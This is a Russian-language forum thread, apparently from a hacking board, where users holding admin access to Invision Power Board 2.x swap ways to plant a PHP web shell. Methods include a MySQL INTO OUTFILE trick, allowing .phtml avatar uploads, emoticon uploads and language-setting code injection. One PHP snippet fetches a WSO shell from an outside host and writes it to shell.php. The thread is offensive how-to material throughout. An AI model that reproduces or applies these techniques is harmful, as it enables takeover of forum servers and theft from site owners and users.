Проблема такая! Имею доступ к админке IPB 2.1.6 но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload) также немогу через смайлы =( нет доступа Какие есть еще варианты залить шелл??
Можно через мускуль... к примеру: CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `ibf_shell`
Для всех чтоыб не было проблемм с заливкой шеллов. В версиях 1.*-2.0.* шелл заливаеться через смайлы. Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php. В версиях 2.1.* шелл заливаеться через аватары. Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий. Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше). Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла. Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает. А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.
имеется IP.Board v2.3.5 но не могу залить шелл через атачи также немогу через смайлы пробывал через стили, тоже не выходит может кто знает есчо способ??
navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку. Воть нашол у себя, думаю должен понять
делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет? $data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt')); $fp=fopen('./shell.php','wb'); fputs($fp,$data); fclose($fp); правильно я написал??
короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?
Парни в чем проблема таже трабла ,уже что только не испытал , при попытке вывести шелл , выводит в исходном коде , достало ).
например:надо в шеле убрать <?php, и ?> и залить на фрих в .txt, и в админке,в languages прописать ваш код.
